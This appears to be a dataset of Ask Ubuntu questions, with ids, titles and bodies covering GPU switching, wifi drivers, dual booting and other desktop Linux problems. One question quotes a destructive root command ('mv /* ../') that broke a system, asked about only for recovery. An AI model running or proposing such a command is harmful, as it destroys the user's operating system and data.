400435	nvidia geforce gt 750m with bumblebee on ubuntu 13.10 giving error	i have an acer aspire v7 running ubuntu 13.10 with an nvidia geforce gt 750m graphics card . currently though i 'm not using this at all i 'm just using the standard integrated haswell graphics . i 've tried installing the bumblebee package by following the instructions here but whenever i try to run an application using the nvidia card i get the following error message : [ 1641.382331 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 1641.382365 ] [ error ] aborting because fallback start is disabled .
400442	applications using shortcut	is possible to find out if any application uses some short-cut ? i would like to assign some action to short-cut but do n't know if its already used . thank you
400447	new ubuntu user swap	i 'm new to ubuntu website and operating system , and as i am very curious , i searched some topics , and i noticed something called swap , i know its supposed to be twice the physical ammount that we own , but i ca n't seem to change it myself , if needed . i wan na know if when i installed ubuntu , the installation made the swap file for me , or do i need to create one ? if so , can any of you guys , help me do it ? thank you .
400448	synaptics broken	i was trying to install vlc player and i installed it manually : sudo add-apt-repository ppa : videolan/stable-daily sudo apt-get update sudo apt-get install vlc the install messed up and gave me this error e : the package libvlccore5 needs to be reinstalled , but i ca n't find an archive for it . e : internal error opening cache ( 1 ) . please report . now every time i open synaptics package manager it gives me this error and closes . i ca n't install this package . i checked the permissions and they are all ok .
400455	using 2 wifi adapers to increase speed	i have a modem from my provider with wireless and a wireless router . both work on a different channel and are on a different floor . but no matter which channels i choose , sometimes the wireless signal just drops in speed . relocating the modem and router also does not help . just too many other devices from neighbours seems to be the problem . i have a build-in wifi adaptor and a usb wifi adaptor . what is the best way to bundle these connections ? i download a lot from usenet , so manual switching is no option .
400456	is there a way to know the creation date of a folder ?	i ca n't find the creation date in the properties . is there a way to know ? i tried arranging the files by modification as to know which were created first but i do n't know if it is in ascending or descending order .
400457	how to get ltsp working with client and server on vbox on different laptops and connected via wifi router ?	i have setup client in vbox . vbox adapter connects to host which connects to wireless router . having trouble seeing the ltsp server . ( router has 192.1.168.xx dhcp with mask 255.255.255.0 ) ltsp resides on ubuntu in vbox on another laptop - similarly connected using vbox adapter to host . a client on this vbox connects fine with server dhcp network as 192.168.2.xx and mask 255.255.255.0 . _________________________________________________________ | wireless router | |192.168.1.1 ; range 192.168.1.100 - 192.168.1.199 | | mask 255.255.255.0 | |________________________________________________________| | | | | | | | | __________________________ ______________________ | laptop 1 , wifi | | laptop2 , wifi | | ________________________| | __________________| | |vbox guest1 | | |vbox guest1 | | |ubuntu ; 192.168.1.106 | | |pxe client | | |ltsp server ; 192.168.2.1| | | ( does n't work ) | | |_______________________| | | ( also tried with | | ________________________| | |ltsp server range| | |vbox guest2 | | |192.168.1.200 to | | |pxe client ( works ) | | |192.168.1.250 | | | | | | for dhcp ) | | |_______________________| |___|_________________| |_________________________| i can ping 192.168.2.1 from laptop2 without any problem
400464	banshee -- next from virtual console	i would like to do banshee -- next , or just control banshee in general , from a virtual console ( e.g. , the one i get when i press ctr-alt-f1 ) . is that possible ? how can i do it ?
400471	synergy wont be installed	hello i 'm new to linux and all that so i might have lots of questions . if possible it would be cool to be directed to a site where all kinds of commands all the good things to know about linux and ubuntu is explained in a good way . heres my question . when i 'm trying to install synergy , it says : '' dpkg : fejl under behandling af synergy-1.4.15-linux-i686.deb ( -- install ) : synergy : i386 1.4.15 ( multi-arch : no ) is not co-installable with synergy : amd64 1.3.8-1ubuntu1 ( multi-arch : no ) which is currently installed der opstod fejl under behandlingen : synergy-1.4.15-linux-i686.deb all help is appreciated
400474	wifi did n't connect after ugrade kernel 3.11.0-15-generic	sorry but i 'm from germany . my english is not good . i have installed xubuntu 12.04.3 on my laptop . i could n't get sound over hdmi so i upgraded the kernel to 3.11.0-15-generic . since this update and after i reinstalled the nvidia driver my hdmi audio works very well . but now my wlan has a problem . normaly after login the wlan connects automaticaly . but now no connection . when i disable wlan ( keyboard : fn + f11 ) and enable again , than wlan connects without any problems . wired is not connected . sudo lshw -c network *-network beschreibung : ethernet interface produkt : rtl8111/8168/8411 pci express gigabit ethernet controller hersteller : realtek semiconductor co. , ltd. physische id : 0 bus-informationen : pci @ 0000:06:00.0 logischer name : eth0 version : 02 seriennummer : 00:90 : f5:91 : b3:43 größe : 10mbit/s kapazität : 1gbit/s breite : 64 bits takt : 33mhz fähigkeiten : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation konfiguration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s ressourcen : irq:46 ioport:4000 ( größe=256 ) memory : f4100000-f4100fff memory : f4000000-f400ffff memory : f4020000-f403ffff *-network beschreibung : kabellose verbindung physische id : 4 bus-informationen : usb @ 2:5 logischer name : wlan0 seriennummer : 00:25 : d3:2d:92:26 fähigkeiten : ethernet physical wireless konfiguration : broadcast=yes driver=rtl8187 driverversion=3.11.0-15-generic firmware=n/a ip=192.168.251.131 link=yes multicast=yes wireless=ieee 802.11bg have anyone an idea what the problem is ? greetings alex
400477	setting dvi monitor as primary display	i 'm trying to set things for youtube hangouts and capturing my desktop but it always records my secondary monitor instead of my moin one . none of the following works : setting the primary display in nvidia-settings rearranging monitors on monitor settings xrandr -- output -- primary editing ~/.monitors.xml the only method that works is shutting down unwanted monitor , start the hangout and then turning it back on which is pretty annoying . i previously had success setting manually the order of displays on xorg.conf , but i ca n't find the option name anywhere anymore
400478	what to do if system stops running during install ?	my system is an ibm thinkpad t23 i am trying to install ubuntu 13.10 and the computer stops running during `` configuring bcmwl-kernel-source '' . what should i do ?
400479	hey whats wrong with ubuntu 10.10	hey whats wrong with ubuntu 10.10 . software center is not working . can not install chrome , flash or anything in command line also .
400480	how to disable right click in menus ?	i 'm having troubles with the right click , because when i press in dolphin or in chrome to open some menu action , the right click open the menu and start the first action in that menu in the same click ! i want to disable the right click not for open menus , just for click ! or move the menu away of the click position ...
400482	can i have two distros on the same partition using btrfs ?	i 'm using btrfs successfully and have luckily separate home and system partitions . using ubuntu 13.10 and wanting to test 14.04 , how can i do this using the btrfs file system ? the system has an efi partition , but no extra boot partition . /boot is inside the system partition ( / @ /boot ) .
400483	how to watch videos in uk from somewhere else ?	i want to stream the highlights of nfl but i need an uk/irish ip-address to watch the video . i have tried with proxies ( i managed sometime ago to get the bbc iplayer working ) but they are very slow and i still get the error that i 'm not in the right country . in short : i 'm looking for a british proxy server with video support or some other way to get around the ridiculous ip block .
400486	using serial port as a terminal interface with vmware ?	i have the following configuration setup : ubuntu 12.10 os a virtual machine using vmware . host os is windows 8.1 terminal program is putty as a serial terminal in windows 8.1 process : ubuntu vmware machine : hardware is serial port 2 using \\.\pipe\com_1 windows 8.1 , putty is set to serial line \\.\pipe\com_1 speed 115200 on a terminal in ubuntu : billm @ ubuntu : ~ $ echo hello > /dev/ttys1 bash : /dev/ttys1 : permission denied nothing shows up on the putty terminal window at windows 8.1 what can i do to prove that ubuntu can talk serially to putty ?
400490	no ~/.vim folder in ubuntu 13.04 where to go for it	i am trying to install different plug-ins in vim . i have installed vim using sudo apt-get install vim . but the downloaded files for these plug-ins need to be placed in ~/.vim folder . but there is no such folder . i 've found a vim folder in /etc and also in /usr/share directories . which one to use.. ? ?
400495	removing ubuntu boot loader	i use the dual os system that is windows7 and ubuntu 12.04. windows is installed on the c drive. , but ubuntu is installed in a separate partition `` f '' drive ... once i have installed the ubuntu in the f drive ... , but deleted the folder of ubuntu by mistake . once again the i installed the ubuntu ... .in the same drive.. , but now when i start the system.. , the boot manager appears like. , windows 7 u buntu u ubuntu the extra option ubuntu does not open but shows error.. , and the other ubuntu is working properly ... .and windows 7 as well . now how can i remove the extra ubuntu option ... , tried using the command prompt in windows but it displays.. , no folder found . ( or directory of ubuntu ) ..it shows something like file : //*/.mbr not found ... .
400500	high ( er ) idle cpu temps compared to windows	my cpu seems to be getting a lot hotter under ubuntu compared to windows . i am not basing this on actual temperature readings , but simply on the fan that 's kicking in , which it does n't do under windows when i 'm just browsing the web or writing a document . i checked , and one thing i can imagine could be the cause , is two processes that are even during idling using a relative lot of cpu % : init = 24 % unity-panel-service = 17 % note that i have a 3rd generation intel i5 processor in here , so i do n't think these percentages are to be expected ... other system specifications : 8gb ddr3 128gb ssd + 640gb hdd intel 3000 graphics it 's a laptop : hp probook 6560b . i hope anyone has any suggestions ! edit : just 'stopped ' the init process from the system monitor , and the fan almost instantly stopped blowing . it seems to be ok now , but this is a recurring problem as it has happened before . so i 'm guessing somehow something is causing the init process to get stuck , or something like that .
400501	installing ubuntu-12.04.3-desktop-amd64 from windows	whats wrong with this version of installer.. no error no warning and is not moving forward from here . my internet connection is also good . i really dont understand still how much time will it takes to download amd64.tar.xz please can any one help me in installing ubuntu.sorry , i am unable to provide screen shots as i am not having reputation of 10 : (
400502	will installing windows 8 remove ubuntu ?	as of now i 'm running ubuntu 13.10 alongside windows 7 . i 'm planing on upgrading windows 7 to win8 . after upgrading will windows 8 delete my current installation of ubuntu ?
400508	chmod a partition read-add files only	i am looking for a way to chmod an entire drive partition so that you are able to read and add files but not modify or delete them is there an easy way to do that ? i have looked arround a bit but havent found anything useful
400513	openvpn kde network-manager ( shows connected but no internet )	i am trying to create openvpn connection . i have set up an openwrt router to work as server . i name it 'myvpn ' and it can connect to it but i have no internet . i am not sure if i have set the correct keys or i miss something else . i initially copied the keys from 192.168.1.1 to my home folder and from there i load them during the vpn setup . later , i have copied the keys from 192.168.1.1 to /etc/openvpn/ and gave chmod 400 /etc/openvpn and now i ca n't open this folder in order to fill the keys in the configuration dialog of vpn . settings : gateway : 192.168.1.1 connection type : x.509 ca file : ca.crt certificate : anonymous.crt key : anonymous.key
400514	kernel panic - not syncing : a hardware or a software issue ?	when i try to start my pc i can hear the cpu fan spinning up then turning itself off before again spinning up , repeating itself . nothing is visible on the screen . disconnecting the power plug and pressing the power on button to flush the system of residual charge sometimes helps avoid this problem and about 1 in 5 times i am able to boot the system . once the system is running it usually crashes within 2-6 minutes . see attached image for error ( s ) : is this the sign of a faulty motherboard , as the pc has problems starting ? is there other hardware which could be failing ? side note : a few weeks ago , the problems were not too severe and the computer would only crash after an hour or two so i was able to do an upgrade , thinking this would help . having tested my pc under ubuntu 13.04 and after upgrading to 13.10 ( currently installed ) the problem still persists . i have also tried various kernels to no avail . the issues exist even if i do n't log in to graphical mode ( ctrl + alt + f1 ) . any help is appreciated .
400515	repairing after `` mv /* ../ ''	after leaving my laptop with an open root shell on my desk ( running ubuntu 13.10 ) , some not so nice person bricked my system using `` mv /* ../ '' is there any easy way to fix this or am i better off saving what can be saved and reformatting ?
400516	installing shell themes via command line	i ca n't figure out how to install a new gnome-shell theme in a bash script . i 'm unzipping the .zip to ~/.local/share/themes and gsettings set org.gnome.shell.extensions.user-theme name 'theme' but it does n't work . i can use the gsettings after i add the theme with gnome-tweak-tool , i ca n't figure out what it does besides unzipping the folder . can someone help me please ?
400517	dual boot partitioning	i have a netbook that shipped with a primary partition with windows on it and a hidden partition with operating system restore features . i wish to setup a dual boot windows and ubuntu but im concerned that the repartitioning of the primary hard drive will affect the hidden partition with the windows operating system restore . will the hidden partition be affected when setting up new partitions to allow dual boot .
400525	down load problems	downloaded ubuntu-13.10-desktop-amd64 two times and the md5 does not match . both are 904,192 kb down loaded from ubuntue web page , http : //www.ubuntu.com/download any suggestions ?
400526	smart status - disk failure is imminent [ reallocated sector count failing ]	as the title suggests , i 'm in a bit of a pickle . screenshot of smart data : i have installed gparted but i have no idea how to use it . screenshot of my partitions in gparted : could someone please explain to me , the layout of my hard drive and what it all means ? i have looked at all the other similar questions but i just ca n't make sense of the answers . i know the best for me is to get a new hard drive but that 's not an option at the moment . could anyone please provide me with a temporary solution using gparted or otherwise ? thank you .
400533	howto unpinned icons from terminal	good day to all , i was wondering how to unpinned desktop icons from terminal . yes , it is easier to do it with the buttons mouse , the but is that the right one is not working and for my own needs i do n't need that button at all . this is why i am looking for any suggestion to do it through the terminal . thanks in advance
400535	how can i install a two disk game with wine ?	i would like to install medieval ii : total war under wine . everything goes well until i am prompted to install the second dvd-rom to finish the install . no matter what path i supply to the installer it says setup ca n't find a file on the specified path or disk . i 've tried the options shown for d and z drives , /dev/sr0 , /media/myname etc . i 've also had similar problems with medal of honour . can anyone help ?
400536	reinstallation of windows in dual boot system	i have windows 7 and ubuntu 12.04 as dual os . i need to reinstall a fresh windows 7 os . the boot manager lies on windows partition as windows was the first os . can someone help me in this matter ? ?
400537	ca n't connect to wireless 13.10	i am having problems with my wireless connection using ath9k , i can not connect to any wireless network . i can connect to the wireless network fine on windows 8.1 but when using ubuntu gnome i have no luck . any help appreciated . os : ubuntu gnome 13.10 what has been tried so far : sudo modprobe -r ath9k sudo modprobe ath9k nohwcrypt=1 sudo modprobe -r brcmsmac echo `` blacklist brcmsmac '' | sudo tee -a /etc/modprobe.d/blacklist.conf wireless card : tp link tl-wdn3800 *************** info trace *************** ***** uname -a ***** linux jamie 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux ***** lsb_release ***** distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy ***** lspci ***** 03:00.0 network controller [ 0280 ] : qualcomm atheros ar93xx wireless network adapter [ 168c:0030 ] ( rev 01 ) subsystem : qualcomm atheros device [ 168c:3116 ] kernel driver in use : ath9k 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : gigabyte technology co. , ltd motherboard [ 1458 : e000 ] kernel driver in use : r8169 ***** lsusb ***** bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 004 device 004 : id 15d9:0a4d trust international b.v. optical mouse bus 004 device 007 : id 413c:2107 dell computer corp . bus 004 device 002 : id 2109:3431 bus 004 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ***** pcmcia card info ***** ***** iwconfig ***** wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off ***** rfkill ***** 0 : phy0 : wireless lan soft blocked : no hard blocked : no ***** lsmod ***** brcmsmac 562767 0 cordic 12574 1 brcmsmac brcmutil 15618 1 brcmsmac bcma 46670 1 brcmsmac ath9k 151173 0 ath9k_common 13859 1 ath9k ath9k_hw 444645 2 ath9k_common , ath9k ath 23827 3 ath9k_common , ath9k , ath9k_hw mac80211 596969 2 ath9k , brcmsmac cfg80211 479757 4 ath , ath9k , brcmsmac , mac80211 ***** nm-tool ***** networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 94 : de:80:78:51:14 capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : disconnected default : no hw address : a0 : f3 : c1:24 : c5:87 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points btwifi-with-fon : infra , 02:22:69:6b : ff:48 , freq 2437 mhz , rate 54 mb/s , strength 57 btwifi : infra , 02:22:69:6b : ff:4b , freq 2437 mhz , rate 54 mb/s , strength 65 talktalk : infra , 20 : f3 : a3 : fe:0d:16 , freq 2462 mhz , rate 54 mb/s , strength 82 wpa wpa2 bthomehub2-tmw4 : infra , 00:22:69:6b : ff:4a , freq 2437 mhz , rate 54 mb/s , strength 64 wpa wpa2 virginmedia2978209 : infra , 74:44:01 : f3:23 : c0 , freq 2462 mhz , rate 54 mb/s , strength 30 wpa wpa2 ***** networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false ***** interfaces ***** # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback ***** iwlist ***** wlan0 scan completed : cell 01 - address : 20 : f3 : a3 : fe:0d:16 channel:11 frequency:2.462 ghz ( channel 11 ) quality=64/70 signal level=-46 dbm encryption key : on essid : '' talktalk '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000009e93517f extra : last beacon : 1156ms ago ie : unknown : 000854616c6b54616c6b ie : unknown : 010882848b960c121824 ie : unknown : 03010b ie : unknown : 050400010000 ie : unknown : 2a0104 ie : unknown : 32043048606c ie : unknown : 2d1a0e181eff00000000000000000000000000000000000000000000 ie : unknown : 3d160b070000000000000000000000000000000000000000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c330e181eff00000000000000000000000000000000000000000000 ie : unknown : dd1a00904c340b070000000000000000000000000000000000000000 ie : unknown : dd0600e04c020160 ie : unknown : dd0e0050f204104a0001101044000102 cell 02 - address : 74:44:01 : f3:23 : c0 channel:11 frequency:2.462 ghz ( channel 11 ) quality=24/70 signal level=-86 dbm encryption key : on essid : '' virginmedia2978209 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000011cc720019c extra : last beacon : 1172ms ago ie : unknown : 001276697267696e6d6564696132393738323039 ie : unknown : 010882848b962430486c ie : unknown : 03010b ie : unknown : 050400010000 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d160b080400000000000000000000000000000000000000 ie : unknown : dd180050f204104a00011010440001021049000600372a000120 ie : unknown : dd090010180203f02c0000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ***** resolv.conf ***** ***** blacklist ***** output for lsmod | grep -e 'ath|brcmsmac' ** lsmod | grep -e 'ath|brcmsmac ' ** ath9k 151173 0 ath9k_common 13859 1 ath9k ath9k_hw 444645 2 ath9k_common , ath9k ath 23827 3 ath9k_common , ath9k , ath9k_hw mac80211 596969 1 ath9k cfg80211 479757 3 ath , ath9k , mac80211 output for dmesg | grep -e 'cfg|ath|wlan' http : //paste.ubuntu.com/6698611/
400540	13.10 cursor disappears on asus x200ca w/ touch screen	i installed 13.10 on this asus x200ca-ct156h 11 '' laptop with touchscreen . a version of this model without the touchscreen is sold with ubuntu but this one was with win 8 . i get random cursor disappearing , especially when using vlc ( full screen i think ) and if i try to use synergy with this laptop as client — in those cases the cursor disappear every time . i can get it back by switching on and off , sometimes a few times , the touchpad with the fn+key shortcut . i tried gsettings set org.gnome.settings-daemon.plugins.cursor active false that i saw in another thread but it does n't help . thanks . edit : i supposed the bug was because of the touchscreeen so i looked into xinput ~ $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ atmel atmel maxtouch digitizer id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ usb2.0 hd uvc webcam id=10 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] i disabled the touchscreen as i do n't need it , with `` xinput disable 9 '' and added it to my .xsessionrc and it seems to do the trick i think . the cursor does n't disappear anymore when i use synergy .
400541	empty messaging menu in ubuntu 13.10	after a fresh install of ubuntu 13.10 , i see that there is n't any item in the messaging menu on panel . only `` available , busy ... '' the status options . i 've discovered that in new versions of ubuntu , items only appear when they are configured . so , i could have thunderbird , unity mail , empathy , xchat ... `` native '' programs do appear . i 've tried to add gm-notify ( a gmail checker ) and it should appear there , but it does n't . i 've tried to add skype-wrapper , it does n't appear either . in my /usr/share/indicators/messages/applications/ there is the file called indicator-applet-skype which should make appear skype in my messaging menu ... in dconf editor , i 've tried to whitelist gm-notify.desktop and skype-wrapper.desktop through the path /com/canonical/unity/panel ... but it wo n't appear in messaging menu . gm-notify does run , because i receive notifications . but it wo n't appear in messaging menu either . is there a bug on my fresh install or in ubuntu 13.10 ?
400543	moving files from ubuntu to windows	i installed ubuntu with wubi.exe in ( e : ) and want to move all files in ( d : for example ) in windows , how to do it ? in e : i have files like `` wubildr , uninstall-wubi , wubildr , wubildr.mbr '' and some folders like `` ubuntu , disk , boot , grub '' i want to do it because ca n't load ubuntu after reinstalling windows thanks !
400548	installing windows 8.1 on an existing dual boot set up	i 'm currently running a windows 7 and ubuntu 13.10 dual boot set up . i want to install a clean windows 8.1 and maintain my dual boot set up , is it possible ? and if it is how can i do it ? i need to know the preparation process .
400549	canon eos software	i 'm a complete novice with ubuntu . i managed to install it on my computer but now i need to put my image editing software for my canon eos camera onto the computer . on running the .exe file i am informed that an error occurred while loading the archive . the software loaded fine onto my xp -running laptop . i 'm also getting the report listed below : zipinfo : can not find zipfile directory in one of /media/canoneos241w/setup.exe or /media/canoneos241w/setup.exe.zip , and can not find /media/canoneos241w/setup.exe.zip , period .
400550	how do i watch youtube videos ?	the new adobe flash player does not work ( at least for me ) as of 2014 . is there a different way ? ubuntu 12.04 , firefox
400552	my new server has ssh_host_ecdsa_key and ssh_host_rsa_key files on it already , is this normal ?	i have a new dedicated server , which i currently access with username and password over ssh . i have not yet set up an ssh key . i am just looking into it now . so this is a new server with ubuntu freshly installed , is it normal that the /etc/ssh/ directory already has ssh_host_ecdsa_key and ssh_host_rsa_key files on it ? i can also see.pub files for these as well . does this mean whoever set up the server can access it using those key files ? i want to be the only person who can log in to my server . i am not an experienced linux user , still trying to learn . thanks
400553	trying to remove leftover gpt data using fixparts	so i have a laptop that come with windows 8 , like others i dislike it with passion , installed windows 7 over the top ( i assumed it would atleast wipe the mbr properly but i dont think so anymore . anyway this is my partition setup ( according to the mbr table , this is how i set it up , this is all correct : ) and so being the ubuntu enthusiast i have a left over unallocated space at the end , i was going to install ubuntu there with a dual boot , but parted , the partition manager in the ubuntu setup reads that there is no compatible operating systems installed , hmm , so i searched around on google and on askubuntu , there 's a lot of people having leftover gpt data . on the ubuntu live cd , i downloaded and launched fix parts , there was no warning message at the start , i was following this guide ( http : //www.rodsbooks.com/fixparts/ ) , so at first i thought it may not be any gpt data until i got this up according to the guide i should have had a warning at the beginning , and being given the option to remove it . i have created a system image of my windows install onto an external hdd ________________________ -- i also tried using gpt disk , it was very complicated , took me a while to even get it open , and then i count copy the backup of my partition table ( parts.txt ) out of the system rescue cd as i new it would delete when i powered it down . so , how can i remove this gpt data so that parted will see my windows install ? or should i try and convert it all to gpt data ? as requested , here are the outputs to the following commands gdisk doesnt seem to be in the package i have ? or atleast the command is unknown this is the problem i am getting at in the first place , i wish to install ubuntu ( dual booted with windows 7 ) onto that unallocated space at the end of my drive but the ubuntu installer ( i read it uses parted ) simply does not recognise the windows partition
400554	ubuntu 13.04 left click not working after a while	only left click of touchpad and usb mouse not working right mouse click works ... ..hp pavilion dv6000
400559	my pc crashes on ubuntu	my compaq pc with ubuntu 12.04 used to work as it should when all of a sudden , the screen ( along with the rest of the system ) kept either freezing or crashing . by freezing , the screen keeps stuck where it was . no mouse or keyboard shortcut can get it back to life . by crashing , the screen shows a blur decomposition of whatever was showing before or , some other times , a black background with a whole pattern of short slopped lines on top ( i describe as i am not allowed yet to put up images ) . no response neither to any shorcut keys . manual power off is needed before restarting . sometimes then , the boot screen shows up distorted with vertically ligned-up whitw dots over the blue background ( its a typical hp boot screen ) . the system wo n't start nor do nothing . power off and unplugging is needed to be granted a new try . sooner or later it restarts and boots normally . apparently random , looks though like it happens when massive resources are about to be used : at video/flash web sites ( chrome and firefox ) , opening email manager ( thunderbird ) , or just starting up . all this happened sooo often with ubuntu 12.04 and 13.10 . now i use a light lubuntu and midori as the browser , and it has happened just a couple of times in the past week . which i can live with ... anybody got any idea of what the reason can be ? ubuntu vira ? too old ( 5 years-old ) hardware ? too many partitions for dual boot with windows vista ( which by the way stopped starting up before all this happened on ubuntu ) ? windows vira spread over partitions ? ? ? thanks ...
400566	ubuntu hangcheck timer elapsed ... gpu hung	i am using ubuntu 12.10 64bit on a 4 month old manufacturer constructed gateway pc bought from best buy . the screen has gone dark and this error appears on the screen : [ 509156.065626 ] [ drm : i915_hangcheck_hung ] *error* hangcheck timer elapsed ... gpu hung [ 509156.070291 ] [ drm : i915_write32 ] *error* unknown unclaimed register before writing to 220a8 [ 509165.087235 ] [ drm : i915_hangcheck_hung ] *error* hangcheck timer elapsed ... gpu hung screenshot : the screen will not come back on , i have tried alt+f1 through alt+f7 . i 've tried ctrl+alt+del , esc and nothing wakes up the monitor . does anyone know how to fix this error ? troubleshooting details for those interested in debugging : i can still ssh into the box while the monitor is showing the error . i can still ssh into the box , here is the uname -a : linux apollo 3.8.0-33-generic # 48~precise1-ubuntu smp thu oct 24 16:28:06 utc 2013 x86_64 x86_64 x86_64 gnu/linux here is an exerpt from the dmesg error log : [ 509156.065626 ] [ drm : i915_hangcheck_hung ] *error* hangcheck timer elapsed ... gpu hung [ 509156.065709 ] [ drm ] capturing error event ; look for more information in /debug/dri/0/i915_error_state [ 509156.070291 ] [ drm : i915_write32 ] *error* unknown unclaimed register before writing to 220a8 [ 509165.087235 ] [ drm : i915_hangcheck_hung ] *error* hangcheck timer elapsed ... gpu hung the computer was acting up before this event , where the screen would go dark , and i would have to press alt+f2 and the monitor would refresh . this was getting worse and worse over the last 4 days . the temperature inside the house is never above 75 degrees . running a sudo shutdown -r now and sudo halt does not reboot the computer . holding down the power button reboots the computer , monitor comes back on and the problem eventually comes back after a while .
400568	got a bumblebee error : hp-notebook bumblebeed [ 3064 ] : [ xorg ] ( ee ) invalid isolated device specification	i have a hp pavilion 15-n061sr ( energy star ) laptop with 2 videocards : nvidia geforce 740m and intel 4000 hd . i installed ubuntu 13.10 x86_64 and bumblebee by following these instructions : https : //wiki.ubuntu.com/bumblebee # installation also installed nvidia-319-updates , nvidia-settings-319 . when i try : optirun firefox , i got error : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) [ error ] aborting because fallback start is disabled . in /var/log/syslog i got following error : hp-notebook bumblebeed [ 3064 ] : [ xorg ] ( ee ) hp-notebook bumblebeed [ 3064 ] : [ xorg ] ( ee ) **invalid isolated device specification** hp-notebook bumblebeed [ 3064 ] : [ xorg ] ( ee ) i tried nvidia-331 , nvidia-331-settings , but with this packages i got same error . in google i found no mention of this error .
400580	copying a large folder . ubuntu stops responding !	i needed to backup my files on an external hdd ( my firend 's hdd ) . i tried to copy a 400gb folder . i failed for about 5 times . ubuntu just becomes still . only the mouse moves . is this some ubuntu bug or is it my pc 's bad specs ? my pc is a core2duo with integrated graphics , 2gb of ram and 2gb of swap . it has 300mb free space on the file-system partition . edit : twice of those times ( where ubuntu stops responding ) were because i tried to open google chrome while it still was in progress . ( that 's when i learnt not to touch the pc till it finishes ) edit : tried to copy a 130gb folder to the hdd . i input the command free -h several times and here 's the output ... then i went to create a new question on askubuntu for about 10 minutes . i finished and went back to the scene you have in the picture ... input free -h in terminal ... terminal did n't post any output ; just froze , then the whole computer froze ( i know it from the launcher ; i put the mouse on it , it expands and does n't recoil ) so i restarted the computer . just as before
400582	my stc internet dongle is not working at all with ubuntu ltc14 . where to start troubleshooting ?	i just bought an unlocked stc internet dongle ( usb stick for internet connection ) and have an mobitel sim ( 3g activated on unlimited plan ) . i cnnnected my sim properly with dongle . nothing happened ! please tell me how to install it . i am using ubuntu 12 with windows xp . p.s it 's detecting on windows but not on ubuntu . thanks ! : )
400587	can i install google chrome without typing lines of text ?	i am a complete dork when it comes to computers so maybe i should forget linux altogether ! i want to install chrome , it has all my bookmarks etc . is there an easy way without writing lines of code in places i can not find ?
